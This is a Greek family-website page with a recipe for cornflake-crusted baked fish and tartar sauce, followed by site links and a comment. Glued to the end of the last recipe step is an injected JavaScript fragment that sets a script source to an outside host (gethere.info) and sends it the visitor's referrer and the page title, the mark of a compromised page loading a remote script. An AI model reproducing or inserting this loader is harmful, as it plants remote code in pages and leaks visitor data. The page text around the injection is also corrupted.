mommy
thilasmos
toketos
mycare - φροντίδα
athome
arkoudos
nanny - επιλέγοντας νταντάδες

Ψητό ψάρι με σάλτσα ταρτάρ

Ψητό ψάρι με σάλτσα ταρτάρ

Υλικά
Ψάρι

1 φέτα φιλέτο ψαριού (π.χ. πέρκα ή μπακαλιάρος)
4 1/4 φλιτζάνια δημητριακά κόρνφλεϊκς
1/3 φλιτζανιού αλεύρι ολικής αλέσεως
1/2 κ.γ. αλάτι
1/4 κ.γ. τριμμένο μαύρο πιπέρι
2 αυγά
1/4 φλιτζάνι άπαχο γάλα
ελαιόλαδο

Σάλτσα ταρτάρ
χυμός από 1/2 λεμόνι
1/2 φλιτζάνι μαγιονέζα
1/2 φλιτζάνι γιαούρτι
3 κ.σ. πικαλίλι (συσκευασμένη)
1/4 κ.γ. τριμμένο μαύρο πιπέρι

Εκτέλεση
1. Προθερμάνουμε το φούρνο στους 190 βαθμούς Κελσίου.
2. Κόβουμε τα φιλέτα σε ίσα περίπου κομμάτια.
3. Σε ένα μπολ θρυμματίζουμε τα δημητριακά.
4. Σε ένα δεύτερο μπολ μέσο, ανακατεύουμε το αλεύρι, το αλάτι και το μαύρο πιπέρι.
5. Σε ένα τρίτο μπολ μεσαίου μεγέθους ρίχνουμε τα αυγά και το γάλα και χτυπάμε με ένα πιρούνι.
6. Βουτάμε το κάθε κομμάτι ψαριού σε αλεύρι, στο μείγμα των αυγών και στη συνέχεια στα δημητριακά. Κάθε κομμάτι θα πρέπει να επικαλύπτεται πλήρως με νιφάδες.
7. Αλείφουμε το ταψί και τοποθετούμε τα κομμάτια ψαριού. Ψεκάζουμε ελαφρά τα κομμάτια με ελαιόλαδο.
8. Ψήνουμε για περίπου 15-20 λεπτά. Ενώ το ψάρι ψήνεται, προετοιμάζουμε τη σάλτσα ταρτάρ.
9. Σε ένα μικρό μπολ, προσθέτουμε τη μαγιονέζα και το γιαούρτι. Χτυπάμε με ένα πιρούνι μέχρι να γίνει λείο. Προσθέτουμε το πικαλίλι, το μαύρο πιπέρι και 2 κ.γ. χυμό λεμονιού. Ανακατεύουμε μέχρι να ομογενοποιηθούν.
10. Σερβίρουμε το ψάρι με μια κουταλιά σάλτσα ταρτάρ στην κορυφή ή στο πλάι.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Share This
2 Σχόλια
  1. […] Ψητό ψάρι με σάλτσα … […]